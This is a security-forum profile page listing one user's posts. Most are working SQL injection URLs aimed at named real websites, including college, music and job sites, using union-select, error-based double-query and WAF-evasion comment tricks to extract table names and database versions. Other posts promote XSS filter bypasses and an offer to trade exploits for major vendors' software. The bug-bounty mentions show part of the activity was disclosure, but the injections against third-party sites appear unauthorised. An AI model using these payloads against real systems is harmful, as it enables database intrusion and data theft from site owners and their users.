Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 1
Results 1 - 25 of 25
6 months ago
Vaibs
sup? hit me on skype localhost.vaibs exploits on Microsoft,Oracle,Ebat,Adobe,Apple,Yahoo etc.. available. Vaibs
Forum: Jobs
1 year ago
Vaibs
Sad Man. You should decode before executing it.Try using hackbar and run it again. http://www.maold.com/user.php?id=1 && AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
Forum: SQL and Code Injection
1 year ago
Vaibs
No limit is is required,All tables are visible jus the space was needed. http://www.mangaldeep.co.in/news1.php?id=-3+union+select+1,CHAR(60, 98, 108, 105, 110, 107, 62, 60, 104, 49, 62, 83, 101, 101, 32, 66, 101, 108, 111, 119, 60, 47, 104, 49, 62, 60, 47, 98, 108, 105, 110, 107, 62),GROUP_CONCAT(CHAR(60, 98, 114, 47, 62),table_name),4+from+information_schema.tables+where+table_schema=database()-
Forum: SQL and Code Injection
2 years ago
Vaibs
On my blog http://adf.ly/E81iz . Xss bypassing without using alphanumeric characters. Xss bypass without using <script>,",/,alert, etc.
Forum: Obfuscation
2 years ago
Vaibs
Xss waf bypass using non-alphanumeric characters.Generate alert without using characters or numbers. + Detailed process for webpage rendering for begineers who want to go for XSS. here is the link http://adf.ly/E81iz
Forum: News and Links
2 years ago
Vaibs
Xss waf bypass using non-alphanumeric characters.Generate alert without using characters or numbers. + Detailed process for webpage rendering for begineers who want to go for XSS. here is the link http://adf.ly/E81iz
Forum: OMG Ponies
2 years ago
Vaibs
Xss waf bypass using non-alphanumeric characters.Generate alert without using characters or numbers. + Detailed process for webpage rendering for begineers who want to go for XSS. here is the link http://adf.ly/E81iz
Forum: XSS Info
2 years ago
Vaibs
detals? join facebook.com/vaibstechboy
Forum: XSS Info
2 years ago
Vaibs
Revaling my name does not matter.This group is slow. I reported mozilla and earned 1000$ already.
Forum: Jobs
2 years ago
Vaibs
LOL buddy start studing mysql.see the inbuilt functions. ->database() = shows name of the database. ->version or @@version = shows version. ->user() = local or remote user identity ->@@basedir = directory ->@datadir = work the same shows mysql dir
Forum: SQL and Code Injection
2 years ago
Vaibs
POC http://vaibs.comuv.com/5.jpg http://vaibs.comuv.com/6.jpg http://vaibs.comuv.com/7.jpg http://vaibs.comuv.com/8.jpg http://vaibs.comuv.com/9.jpg http://vaibs.comuv.com/10.jpg http://vaibs.comuv.com/11.jpg http://vaibs.comuv.com/12.jpg http://vaibs.comuv.com/13.jpg http://vaibs.comuv.com/14.jpg
Forum: XSS Info
2 years ago
Vaibs
Those are others broda,,,
Forum: XSS Info
2 years ago
Vaibs
Report it to the owner to get What they give. LIST: Posting msn vulnerability to microsoft will paste your name on their Hall of fame page. msn.com http://vaibs.comuv.com/msnxss.jpg http://vaibs.comuv.com/1.jpg Yahoo will appreciate and send you T-shirts :P yahoo.net http://vaibs.comuv.com/1.jpg Mozilla Pays 500$ on reporting. mozilla.org http://vaibs.comuv.com/mozilla.jpg Ba
Forum: Jobs
2 years ago
Vaibs
http://vaibs.comuv.com/baidu%20xss.jpg Who knows chinese or what ever can find that page. Let see
Forum: XSS Info
2 years ago
Vaibs
Reported to Yahoo http://vaibs.comuv.com/1.jpg
Forum: XSS Info
2 years ago
Vaibs
I sqlied it. Wot say ?:P https://lh4.googleusercontent.com/-GdUEB3B7thk/TxH182T_azI/AAAAAAAABAk/uW3qmti4foM/s800/msn.png Nothing to hide. ........................................Vaibs.......................................
Forum: Full Disclosure
2 years ago
Vaibs
Anyway Thnx guys. One of my fren helped me. here it is: http://gpl4you.com/myinternship.php?id=1314+or+1+group+by+concat_ws%280x7e,%28select+table_name+from+information_schema.tables+where+table_schema=database%28%29+limit+0,1%29,floor%28rand%280%29*2%29%29+having+min%280%29+or+4--&page=0
Forum: SQL and Code Injection
2 years ago
Vaibs
PHP Code 1: http://gpl4you.com/myinternship.php?id=1314&page=0 How i bypassed PHP Code 2: http://gpl4you.com/myinternship.php?id=1314&page=0+/*!UnIoN*//*%0A*//*!SeLeCt*//*%0A*/+1--+ Now wot to do some thing like PHP Code3: http://gpl4you.com/myinternship.php?id=1314&page=0%20and%20%28/*%0A*//*!SeLeCt*//*%0A*/%20*%20from%20%28/*%0A*//*!SeLeCt*//*%0A*/%20/*%0A*/%20name_const%
Forum: SQL and Code Injection
2 years ago
Vaibs
http://www.cgc.edu.in/cgc-photogallery.php?rpp=20' neither order by nor having -- working. what to do?
Forum: SQL and Code Injection
2 years ago
Vaibs
no meaning of the statement shown below? That state means you need to use double query i think. Tell me why its working in simple union all select .?
Forum: SQL and Code Injection
2 years ago
Vaibs
http://www.drkist.edu.in/html/GallaryAlbum.php?gid=-7%20and%20%28/*!select*/%201%20from%20%28/*!select*/%20count%28*%29,concat%28%28/*!select*/%20/*!concat%28version%28%29%29*/%20%20from%20/*!information_schema.tables*/%20limit%200,1%29%20from%20/*!information_schema.tables*/%20/*!group*/%20by%20x%29a%29--+ tried this already...................
Forum: SQL and Code Injection
2 years ago
Vaibs
fILTERED ONE.SMALL DOUBLE QUERY http://www.drkist.edu.in/html/GallaryAlbum.php?gid=-7%20and%20%28/*!select*/%20%20*%20from%20%28/*!select*/%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29--+ WANT TO GET OTHER DATA WOT TO DO?
Forum: SQL and Code Injection
2 years ago
Vaibs
PM me the link .
Forum: SQL and Code Injection
2 years ago
Vaibs
I think Concat is the problem.If not then post the vul link.
Forum: SQL and Code Injection
2 years ago
Vaibs
How to get table name columns and rest info.Tried to Bypass WAF alot . http://www.mp3hungama.com/music/genre_albums.php?id=-3 and(select 1 from(select count(*),concat((select (select%0aconcat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from /*!information_schema.tables*/ group by x)a) and 6-2=6-2
Forum: SQL and Code Injection
Current Page: 1 of 1